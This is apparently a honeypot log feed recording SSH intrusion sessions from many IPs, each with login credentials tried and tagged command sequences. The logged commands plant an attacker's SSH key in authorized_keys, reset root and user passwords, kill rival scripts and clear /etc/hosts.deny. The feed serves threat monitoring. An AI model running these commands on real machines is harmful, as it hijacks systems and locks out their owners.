$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
🎭 meatball_root_4 (83.233.149.204) β€” LinkΓΆping, Sweden Β· 1 session Β· 2 cmds
2026-05-23 10:07 EDT Β· as aroot/aroot
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 dutch_root_6 (5.253.59.68) β€” Amsterdam, Netherlands Β· 1 session Β· 19 cmds
2026-05-23 10:02 EDT Β· as root/test123
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:k7NRpCbc5PPE"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_81 (128.199.231.94) β€” Singapore, Singapore Β· 1 session Β· 20 cmds
2026-05-23 10:00 EDT Β· as greek/123456
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456\nkiiQ7eEgCfxf\nkiiQ7eEgCfxf"|passwd|bash
$ Enter new UNIX password:
$ echo "123456\nkiiQ7eEgCfxf\nkiiQ7eEgCfxf\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 viking_root_5 (91.92.42.88) β€” Stockholm, Sweden Β· 1 session Β· 1 cmd
2026-05-23 09:46 EDT Β· as user/user
echo
$ echo SHELL_TEST
🎭 phantom_root_70 (182.180.57.212) β€” Islamabad, Pakistan Β· 2 sessions Β· 38 cmds
2026-05-23 09:01 EDT Β· as root/ASDqwe123!@#, root/Qwerty.1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:b8xEOIgLmQqW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:6kWTgRmbHbAr"|chpasswd|bash
🎭 rogue_root_78 (62.60.249.86) β€” Helsinki, Finland Β· 1 session Β· 19 cmds
2026-05-23 08:50 EDT Β· as root/Qwerty.1
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cosGRTBoln5w"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 shadow_root_65 (109.49.23.192) β€” Lisbon, Portugal Β· 1 session Β· 19 cmds
2026-05-23 08:16 EDT Β· as root/ABcd1234
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:Gd02r0G3cddH"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 burger_root_40 (104.131.69.242) β€” Clifton, United States Β· 7 sessions Β· 7 cmds
2026-05-23 08:15 EDT Β· as root/1234qwerQWER
core count check
$ lsblk -o SIZE | grep -v SIZE | head -n 1
$ uname -m
$ lspci | grep VGA | cut -d ":" -f3 || echo None
$ free -h | awk '/Mem/ {print $2}'
$ nproc // core count check
$ lscpu | grep 'Model name' | sed -r 's/Model name:\s+//'
$ echo OK
🎭 wraith_root_69 (41.214.44.152) β€” Dakar, Senegal Β· 1 session Β· 2 cmds
2026-05-23 07:24 EDT Β· as aroot/aroot
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 chai_root (103.180.212.135) β€” New Delhi, India Β· 5 sessions Β· 27 cmds
2026-05-04 00:59 EDT Β· as dbus-helper/warnight, root/QAZ123qaz, root/c31ea01ca12b5558b6503a8143cdb98c
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:cD1ftBIn5zn8"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 rogue_root_79 (45.89.60.81) β€” Tirana, Albania Β· 2 sessions Β· 4 cmds
2026-05-23 05:24 EDT Β· as es/123456, root/Pi@12345678
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
🎭 cowboy_6 (74.87.117.149) β€” Appleton, United States Β· 1 session Β· 2 cmds
2026-05-23 06:17 EDT Β· as headscale/headscale
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 lantern_5 (113.108.13.168) β€” Guangzhou, China Β· 1 session Β· 20 cmds
2026-05-23 06:01 EDT Β· as video/video
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "video\nRPRr4AwRXkhK\nRPRr4AwRXkhK"|passwd|bash
$ Enter new UNIX password:
$ echo "video\nRPRr4AwRXkhK\nRPRr4AwRXkhK\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_82 (103.143.231.2) β€” Kwai Chung, Hong Kong Β· 1 session Β· 2 cmds
2026-05-23 05:55 EDT Β· as luis/Luis123!
file attribute tampering β†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
🎭 specter_root_71 (101.47.155.9) β€” Singapore, Singapore Β· 2 sessions Β· 39 cmds
2026-05-23 04:13 EDT Β· as nimesh/nimesh, root/12345@Abc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:9PgXrDL6NB7g"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "nimesh\nUm0iomrbDPFG\nUm0iomrbDPFG"|passwd|bash
$ Enter new UNIX password:
$ echo "nimesh\nUm0iomrbDPFG\nUm0iomrbDPFG\n"|passwd
🎭 panda_root_22 (14.103.115.90) β€” Beijing, China Β· 1 session Β· 19 cmds
2026-05-23 04:55 EDT Β· as root/Abcd@2024
file attribute tampering β†’ SSH key persistence β†’ CPU profiling β†’ execute from /tmp β†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:VOlmLfLmKaVW"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_64 (103.65.240.34) β€” Khulna, Bangladesh Β· 2 sessions Β· 39 cmds
2026-05-23 04:20 EDT Β· as nimesh/nimesh, root/12345@Abc
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "nimesh\nwSS5qQFnWDYH\nwSS5qQFnWDYH"|passwd|bash
$ Enter new UNIX password:
$ echo "nimesh\nwSS5qQFnWDYH\nwSS5qQFnWDYH\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:smQXR7PHenmt"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
🎭 cipher_root_65 (37.140.216.204) β€” Tashkent, Uzbekistan Β· 1 session Β· 20 cmds
2026-05-23 04:19 EDT Β· as radio/radio
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
